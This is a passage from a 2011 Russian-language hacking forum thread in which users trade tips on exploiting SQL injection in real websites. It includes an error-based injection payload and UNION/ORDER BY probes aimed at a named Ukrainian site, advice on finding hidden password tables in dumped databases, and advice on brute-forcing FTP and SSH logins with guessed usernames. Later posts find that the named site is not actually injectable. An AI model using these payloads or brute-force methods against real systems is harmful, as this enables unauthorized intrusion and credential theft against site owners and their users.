13.05.2011, 16:15
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от ZARO
Есть слепая скуля. Вывод ошибок отключен. Не работают функции mid(),substr() и т.д. Подзапросы выполнятся успешно, а когда в скули есть mid(), substr() то запрос всегда возвращает false. Может это не mysql? И как теперь мне ее крутить если она слепая?
Кинь ссылку сюда или в личку, попробую раскрутить
|
|
|
13.05.2011, 16:19
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от zlo12
Tigger
идея чертовски хороша. но по ходу никак, тиц 250 и 90, могу за пару сотен отдать оба кому-нибудь. жалко выкидывать.
и ещё один вопрос: в последнее время часто стал сталкиваться с тем, что в базах к сайтам попросту отсутсвуют логины с паролями или есть, но не подходят. Что в этих случаях делать?
Если отсутствуют, то возможно:
1) В другой БД
2) доступ в админку по данным из файла
3) Таблица названа не "admin" а к примеру "images_222". Ищи таблицы с условием что в ней есть колонки LIKE '%pass%' и т.д.
Если пасы не подходят:
1) Искать другую админку
2) Просканировать сабдомены
3) Пробрутить FTP \ SSH с использованием хакерской догадки. (Хакерская догадка нужна для подбора логина. Примеры: то что вытащил из скули, root, www, user() которого вытащил скули, site.ru, site, siteru, ftp, etc.....)
|
|
|
|
13.05.2011, 16:43
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
помогите разобраться:
Сообщение от None
http://board.salle.com.ua/index.php?catid=25+OR+(SELECT+COUNT(*)+FROM+(SELEC T+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCA T(MID(VERSION(),1,63),+FLOOR(RAND(0)*2)))
как я понимаю это блинд, но она по идее выводит результаты в отчетах об ошибке, как ту можно еще вывод посмотреть? |
|
|
|
13.05.2011, 17:03
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от winstrool
как я понимаю это блинд
С чего ты взял?
|
|
|
|
13.05.2011, 17:08
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от M_script
С чего ты взял?
потому что запросы ввиде:
+union+select+1,2,3,4,5,6,7,8,9--
+/!union+select+1,2,3,4,5,6,7,8,9--
не проходят, а group+by+ говорит что их 9, а приведеный выше запрос проходит, но введу того что отчет об ошибках там отключен, мы не можем его увидеть, вот и интиресует, что в такой ситуации еще можно придумать...
|
|
|
|
13.05.2011, 17:13
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от winstrool
а group+by+ говорит что их 9
Сравни запросы:
Код:
http://board.salle.com.ua/index.php?catid=25+order+by+9--+
Код:
http://board.salle.com.ua/index.php?catid=25+pohui+chto+pisat+9--+
Результат одинаковый
|
|
|
|
13.05.2011, 17:16
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Там нет скули. Все символы, кроме цифр пропускаются, поэтому приведенные выше запросы эквивалентны запросу
Код:
http://board.salle.com.ua/index.php?catid=259
|
|
|
|
13.05.2011, 17:17
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от M_script
Сравни запросы:
Код:
http://board.salle.com.ua/index.php?catid=25+order+by+9--+
Код:
http://board.salle.com.ua/index.php?catid=25+pohui+chto+pisat+9--+
Результат одинаковый а если так:
Сообщение от None
http://board.salle.com.ua/index.php?catid=25+order+by+10--
Сообщение от None
http://board.salle.com.ua/index.php?catid=25+pohui+chto+ne+napishesh+9--+
|
|
|
|
13.05.2011, 17:17
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от winstrool
потому что запросы ввиде:
+union+select+1,2,3,4,5,6,7,8,9--
+/!union+select+1,2,3,4,5,6,7,8,9--
не проходят, а group+by+ говорит что их 9, а приведеный выше запрос проходит, но введу того что отчет об ошибках там отключен, мы не можем его увидеть, вот и интиресует, что в такой ситуации еще можно придумать...
Думаю, что это Oracle.
|
|
|
|
13.05.2011, 17:20
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от winstrool
а если так:
Да хоть так:
Код:
http://board.salle.com.ua/index.php?catid=2a--_asdqwe@fdMk,.asdl;|+5+$Kfd9
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
